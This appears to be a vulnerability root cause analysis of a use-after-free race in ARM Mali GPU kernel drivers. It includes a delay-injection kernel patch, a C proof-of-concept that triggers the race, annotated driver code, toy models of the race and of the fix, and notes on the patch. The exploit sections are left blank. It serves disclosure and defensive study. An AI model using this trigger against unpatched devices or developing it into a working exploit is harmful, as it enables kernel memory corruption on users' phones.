Maddie Stone & Jann Horn

The Basics

Disclosure or Patch Date: October 2, 2023

Product: ARM Mali GPU Driver

Advisory:

Affected Versions:

Android: Pre-Security Patch Level October 2023

ARM:

  • Midgard GPU Kernel Driver: All versions from r12p0 - r32p0
  • Bifrost GPU Kernel Driver: All versions from r0p0 - r42p0
  • Valhall GPU Kernel Driver: All versions from r19p0 - r42p0
  • Arm 5th Gen GPU Architecture Kernel Driver: All versions from r41p0 - r42p0

First Patched Version:

  • Android SPL 2023-10-05
  • ARM Mali GPU driver r43

Issue/Bug Report: N/A

Patch CL: https://android.googlesource.com/kernel/google-modules/gpu/+/35feb9b795cf1cd0d9a0a2edb6ade3c83040f48b%5E%21/

Bug-Introducing CL: N/A

Reporter(s): Maddie Stone of Google's Threat Analysis Group and Jann Horn of Google Project Zero

The Code

Proof-of-concept:

We applied a kernel patch (repro-kpatch-delay.patch) that injects a 5-second delay into kbasep_os_process_page_usage_drain() so that the PoC can trigger the race:

diff -r -U5 software/arm/VX504X08X-SW-99002-r42p0-01eac0/driver/product/kernel/drivers/gpu/arm/midgard/mali_kbase_mem_linux.c git/foreign/linux3/drivers/gpu/arm/midgard/mali_kbase_mem_linux.c
--- software/arm/VX504X08X-SW-99002-r42p0-01eac0/driver/product/kernel/drivers/gpu/arm/midgard/mali_kbase_mem_linux.c	2023-01-27 13:02:25.000000000 +0100
+++ git/foreign/linux3/drivers/gpu/arm/midgard/mali_kbase_mem_linux.c	2023-08-04 02:07:06.833708970 +0200
@@ -35,10 +35,11 @@
 #include <linux/shrinker.h>
 #include <linux/cache.h>
 #include <linux/memory_group_manager.h>
 #include <linux/math64.h>
 #include <linux/migrate.h>
+#include <linux/delay.h>

 #include <mali_kbase.h>
 #include <mali_kbase_mem_linux.h>
 #include <tl/mali_kbase_tracepoints.h>
 #include <uapi/gpu/arm/midgard/mali_kbase_ioctl.h>
@@ -3409,10 +3410,16 @@

 	rcu_assign_pointer(kctx->process_mm, NULL);
 	spin_unlock(&kctx->mm_update_lock);
 	synchronize_rcu();

+	if (strcmp(current->comm, "SLOWME") == 0) {
+		pr_warn("%s: begin delay injection\n", __func__);
+		mdelay(5000);
+		pr_warn("%s: end delay injection\n", __func__);
+	}
+
 	pages = atomic_xchg(&kctx->nonmapped_pages, 0);
 #ifdef SPLIT_RSS_COUNTING
 	kbasep_add_mm_counter(mm, MM_FILEPAGES, -pages);
 #else
 	spin_lock(&mm->page_table_lock);

poc.c:

#define _GNU_SOURCE
#include <fcntl.h>
#include <err.h>
#include <stdint.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define KBASE_IOCTL_TYPE 0x80

#define __u8  uint8_t
#define __u16 uint16_t
#define __u32 uint32_t
#define __u64 uint64_t

struct kbase_ioctl_version_check {
        __u16 major;
        __u16 minor;
};
#define KBASE_IOCTL_VERSION_CHECK \
        _IOWR(KBASE_IOCTL_TYPE, 0, struct kbase_ioctl_version_check)

struct kbase_ioctl_set_flags {
        __u32 create_flags;
};
#define KBASE_IOCTL_SET_FLAGS \
        _IOW(KBASE_IOCTL_TYPE, 1, struct kbase_ioctl_set_flags)

#define LOCAL_PAGE_SHIFT 12
#define BASE_MEM_MAP_TRACKING_HANDLE (3ul << LOCAL_PAGE_SHIFT)

int main(void) {
  int mali_fd = SYSCHK(open("/dev/mali0", O_RDWR));

  struct kbase_ioctl_version_check vc = {
    .major = 11,
    .minor = 11
  };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_VERSION_CHECK, &vc));
  struct kbase_ioctl_set_flags set_flags = { .create_flags = 0 };
  SYSCHK(ioctl(mali_fd, KBASE_IOCTL_SET_FLAGS, &set_flags));

  /* will not be copied to child, mali sets VM_DONTCOPY */
  void *parent_tracking_page = SYSCHK(mmap(NULL, 0x2000, PROT_NONE, MAP_SHARED,
        mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));

  /* causes split and close handler invocation */
  SYSCHK(munmap(parent_tracking_page+0x1000, 0x1000));

  SYSCHK(signal(SIGCHLD, SIG_IGN));
  pid_t child = SYSCHK(fork());
  if (child == 0) {
    SYSCHK(prctl(PR_SET_NAME, "CHILD"));
    void *child_tracking_page = SYSCHK(mmap(NULL, 0x1000, PROT_NONE, MAP_SHARED,
          mali_fd, BASE_MEM_MAP_TRACKING_HANDLE));
    sleep(2);
    /* invoke close handler, inner side of race */
    SYSCHK(munmap(child_tracking_page, 0x1000));
    /* free mm */
    exit(0);
  }

  sleep(1);
  SYSCHK(prctl(PR_SET_NAME, "SLOWME"));
  /* invoke close handler, outer side of race */
  SYSCHK(munmap(parent_tracking_page, 0x1000)); /* KERNEL-PATCH-ASSISTED DELAY 5 SECONDS */
  SYSCHK(prctl(PR_SET_NAME, "PARENT"));
}

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? Yes

The Vulnerability

Bug class: Use-after-free

Vulnerability details:

The bug is in the handling of the "tracking page" VMA. The intention is that, for a given Mali context, only a single "tracking page" VMA can exist at a time. "Tracking page" VMAs are set up using kbase_tracking_page_setup(). This function tries to enforce the "only one tracking page can exist" rule in three ways: it sets the flags VM_DONTCOPY and VM_IO (to prevent the VMA from being copied into a child process), it sets the flag VM_DONTEXPAND (to prevent expansion of the VMA), and it checks kctx->process_mm under the kctx->mm_update_lock spinlock to ensure that no tracking page VMA already exists.

When a tracking page VMA is torn down, kbasep_os_process_page_usage_drain() is called. This function is responsible for setting kctx->process_mm back to NULL (under the kctx->mm_update_lock) [1] and doing some bookkeeping work on the old kctx->process_mm. This final bookkeeping (kbasep_add_mm_counter()) happens after dropping the kctx->mm_update_lock [2] and without holding any explicit reference on the old kctx->process_mm [3]. If everything were working correctly and only one tracking page VMA could exist at a time, kctx->process_mm would be guaranteed to be current->mm, which would make this safe.

However, before Mali r43, it is possible to create a multi-page tracking VMA, and then split this VMA into several VMAs (for example using munmap()), which breaks the assumption that only one tracking VMA can exist at a time.

This makes the following sequence of events possible:

  1. Process A sets up a Mali context (by opening /dev/mali0 and using the KBASE_IOCTL_VERSION_CHECK and KBASE_IOCTL_SET_FLAGS ioctls).
  2. Process A creates a tracking page VMA with size 0x2000 (this sets kctx->process_mm to the mm_struct of process A).
  3. Process A unmaps 0x1000 bytes of its tracking VMA with munmap(), but leaves the other 0x1000 bytes mapped (this first splits the VMA into two, then removes one of the two VMAs, resulting in kbasep_os_process_page_usage_drain() setting kctx->process_mm back to NULL and doing final bookkeeping on the mm_struct of process A).
  4. Process A forks, creating process B.
  5. Process B creates a tracking page VMA with size 0x1000 (this sets kctx->process_mm to the mm_struct of process B).
  6. Process A begins calling munmap() on its remaining tracking VMA. This syscall runs until the point in kbasep_os_process_page_usage_drain() where the old kctx->process_mm (pointing to the mm_struct of process B) has been read, kctx->process_mm has been set to NULL, and the kctx->mm_update_lock has been dropped; it then gets preempted somewhere in synchronize_rcu().
  7. Process B exits. This involves unmapping the tracking VMA of process B; kbasep_os_process_page_usage_drain() takes the kctx->mm_update_lock, observes that kctx->process_mm is already NULL, drops the lock, and returns. Process B continues to exit and frees its mm_struct.
  8. Process A continues execution of kbasep_os_process_page_usage_drain() with mm pointing to the freed mm_struct of process B. When it does its final bookkeeping on this already-freed mm_struct, a use-after-free write occurs.

The function, annotated with the points [1], [2], and [3] referenced above:

static void kbasep_os_process_page_usage_drain(struct kbase_context *kctx)
{
	int pages;
	struct mm_struct *mm;
	spin_lock(&kctx->mm_update_lock);
	mm = rcu_dereference_protected(kctx->process_mm, lockdep_is_held(&kctx->mm_update_lock));
	if (!mm) {
		spin_unlock(&kctx->mm_update_lock);
		return;
	}
	rcu_assign_pointer(kctx->process_mm, NULL);      // ** 1 **
	spin_unlock(&kctx->mm_update_lock);              // ** 2 **
	synchronize_rcu();                          // ** PREEMPTION HERE **
	pages = atomic_xchg(&kctx->nonmapped_pages, 0);

#ifdef SPLIT_RSS_COUNTING
	kbasep_add_mm_counter(mm, MM_FILEPAGES, -pages); // ** 3 **
#else
	spin_lock(&mm->page_table_lock);
	kbasep_add_mm_counter(mm, MM_FILEPAGES, -pages);
	spin_unlock(&mm->page_table_lock);
#endif
}
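
The eight-step interleaving above can be replayed in a small single-threaded userspace model. This is only a sketch: every toy_* name is hypothetical and not part of the Mali driver, the mm_struct is reduced to a "freed" flag, and locking, RCU, and the VMA split itself are not modeled. It only tracks which pointer each call to the drain function ends up holding.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical stand-in for mm_struct: we only track whether it was freed. */
struct toy_mm {
    bool freed;
};

/* Hypothetical stand-in for kbase_context: only the process_mm pointer. */
struct toy_ctx {
    struct toy_mm *process_mm;
};

/* Models the check in kbase_tracking_page_setup(): refuse a second tracking mm. */
static bool toy_map_tracking(struct toy_ctx *ctx, struct toy_mm *mm)
{
    if (ctx->process_mm != NULL)
        return false;
    ctx->process_mm = mm;
    return true;
}

/* First half of the drain: read the old pointer and clear it ([1] and [2]). */
static struct toy_mm *toy_drain_begin(struct toy_ctx *ctx)
{
    struct toy_mm *mm = ctx->process_mm;
    ctx->process_mm = NULL;
    return mm;
}

/* Second half of the drain ([3]): would the bookkeeping touch freed memory? */
static bool toy_drain_finish_touches_freed(const struct toy_mm *mm)
{
    return mm != NULL && mm->freed;
}

/* Replays steps 2-8; returns true if the final bookkeeping hits a freed mm. */
bool toy_replay_race(void)
{
    struct toy_mm mm_a = { .freed = false };
    struct toy_mm mm_b = { .freed = false };
    struct toy_ctx ctx = { .process_mm = NULL };
    struct toy_mm *saved_by_a;
    bool ok;

    ok = toy_map_tracking(&ctx, &mm_a);         /* step 2: 0x2000 mapping in A */
    (void)toy_drain_begin(&ctx);                /* step 3: partial munmap, A's mm is live */
    ok = ok && toy_map_tracking(&ctx, &mm_b);   /* steps 4-5: fork, B maps tracking page */
    saved_by_a = toy_drain_begin(&ctx);         /* step 6: A reads B's mm, then stalls */
    assert(saved_by_a == &mm_b);
    ok = ok && toy_drain_begin(&ctx) == NULL;   /* step 7: B's drain sees NULL and returns */
    mm_b.freed = true;                          /* step 7: B exits, its mm is freed */
    return ok && toy_drain_finish_touches_freed(saved_by_a); /* step 8 */
}
```

In this model toy_replay_race() returns true: the pointer saved in step 6 outlives the object it points to, because nothing ties the lifetime of process B's mm to process A's in-flight drain.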

Patch analysis:

kctx->process_mm is now managed differently: Instead of setting up and clearing kctx->process_mm when the tracking page is mapped, the driver now sets up kctx->process_mm in kbase_context_common_init(), when a kbase_context is set up, and clears it in kbase_context_common_term() when a kbase_context is torn down.
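
A minimal model of the new ownership rule, under the assumption that only context setup and teardown touch the pointer. All toy_* names are hypothetical. Whether and how the real driver pins the mm_struct while it is stored is not modeled here.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-ins for mm_struct and kbase_context. */
struct toy_mm {
    int unused;
};

struct toy_ctx {
    struct toy_mm *process_mm;
};

/* Models kbase_context_common_init(): the opener's mm is recorded once. */
void toy_context_init(struct toy_ctx *ctx, struct toy_mm *opener_mm)
{
    ctx->process_mm = opener_mm;
}

/* Models kbase_context_common_term(): the pointer is cleared at teardown. */
void toy_context_term(struct toy_ctx *ctx)
{
    assert(ctx->process_mm != NULL);
    ctx->process_mm = NULL;
}

/* Mapping or unmapping the tracking page no longer changes process_mm. */
void toy_tracking_map(struct toy_ctx *ctx)
{
    (void)ctx;
}

void toy_tracking_unmap(struct toy_ctx *ctx)
{
    (void)ctx;
}
```

With this shape, the VMA close handler has no pointer to read and clear, so the window between [2] and [3] in the old function no longer exists in the model.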

Effectively, the driver no longer supports opening the Mali device in process A and then interacting with it from process B. The kernel driver had supported this, but it was apparently unnecessary complexity.

Additionally, kbase_tracking_page_setup() now enforces that the tracking VMA spans exactly one page and returns an error if vma_pages(vma) != 1. Since the tracking page is no longer used for anything, this check should not really matter anymore.
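
The size check can be illustrated with a userspace sketch. The toy_* names are hypothetical, and a 4 KiB page size is assumed (matching LOCAL_PAGE_SHIFT in the PoC). In the kernel, vma_pages() computes the same quantity from vm_start and vm_end.

```c
#include <assert.h>
#include <stdbool.h>

#define TOY_PAGE_SHIFT 12 /* assumption: 4 KiB pages */

/* Hypothetical stand-in for vm_area_struct: only the address range. */
struct toy_vma {
    unsigned long vm_start;
    unsigned long vm_end;
};

/* Mirrors what vma_pages() computes: the VMA length in pages. */
static unsigned long toy_vma_pages(const struct toy_vma *vma)
{
    assert(vma->vm_end >= vma->vm_start);
    return (vma->vm_end - vma->vm_start) >> TOY_PAGE_SHIFT;
}

/* Models the patched check: only a single-page tracking VMA is accepted. */
bool toy_tracking_page_allowed(const struct toy_vma *vma)
{
    return toy_vma_pages(vma) == 1;
}
```

Under this check, the PoC's initial 0x2000-byte mapping would be rejected, while a 0x1000-byte mapping would still be accepted. A single-page VMA cannot be split by a partial munmap().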

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

(Historical/present/future) context of bug:

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

Exploit flow:

Known cases of the same exploit flow:

Part of an exploit chain?

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

Found variants:

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

Ideas to mitigate the exploit flow:

Other potential improvements:

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Other References